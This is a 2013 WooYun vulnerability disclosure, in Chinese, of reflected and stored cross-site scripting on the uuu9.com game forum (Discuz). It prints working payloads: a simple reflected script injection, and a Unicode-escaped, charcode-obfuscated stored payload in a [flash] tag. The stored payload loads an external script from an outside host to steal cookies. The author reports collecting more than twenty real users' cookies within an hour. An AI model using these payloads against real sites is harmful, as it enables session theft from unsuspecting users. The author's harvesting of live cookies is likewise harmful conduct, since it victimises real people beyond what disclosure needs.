当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045547

漏洞标题:游久论坛存在反射和存储型XSS(可获取大量cookie)

相关厂商:uuu9.com

漏洞作者: 拆包

提交时间:2013-12-16 15:23

修复时间:2014-01-30 15:24

公开时间:2014-01-30 15:24

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

过滤不严谨。而且论坛和主站共用一个数据库。。你懂得。

详细说明:

游久论坛采用的是discuz! 2.5
反射型XSS:
http://bbs.uuu9.com/plugin.php?id=auction&action=search
在搜索框中输入
"><script>alert(1)</script>

26.jpg


存储型:
http://bbs.uuu9.com/forum.php?mod=viewthread&tid=10381268
方法:
插入flash
发现 可以把xss 代码转换成unicode执行
http://1.com/1.swf
后面接 "><iframe/onload="document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,50,54,46,97,109,47,99,119,76,83,49,52,34,62,60,47,115,99,114,105,112,116,62));">
把上面的代码转换成unicode就是

\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0036\u0030\u002c\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u002c\u0033\u0032\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0034\u002c\u0039\u0039\u002c\u0036\u0031\u002c\u0033\u0034\u002c\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0034\u0039\u002c\u0035\u0030\u002c\u0035\u0034\u002c\u0034\u0036\u002c\u0039\u0037\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0039\u0039\u002c\u0031\u0031\u0039\u002c\u0037\u0036\u002c\u0038\u0033\u002c\u0034\u0039\u002c\u0035\u0032\u002c\u0033\u0034\u002c\u0036\u0032\u002c\u0036\u0030\u002c\u0034\u0037\u002c\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u002c\u0036\u0032\u0029\u0029\u003b\u0022\u003e


合起来提交的就是 

[flash]http://1.com/1.swf\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0036\u0030\u002c\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u002c\u0033\u0032\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0034\u002c\u0039\u0039\u002c\u0036\u0031\u002c\u0033\u0034\u002c\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0034\u0039\u002c\u0035\u0030\u002c\u0035\u0034\u002c\u0034\u0036\u002c\u0039\u0037\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0039\u0039\u002c\u0031\u0031\u0039\u002c\u0037\u0036\u002c\u0038\u0033\u002c\u0034\u0039\u002c\u0035\u0032\u002c\u0033\u0034\u002c\u0036\u0032\u002c\u0036\u0030\u002c\u0034\u0037\u002c\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u002c\u0036\u0032\u0029\u0029\u003b\u0022\u003e[/flash]


1.jpg


插入的xss代码自由发挥
可用来盗cookie

漏洞证明:

2.jpg


这是我收到的cookie
不到一个小时就收到了20多个人的。

修复方案:

过滤吧

版权声明:转载请注明来源 拆包@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝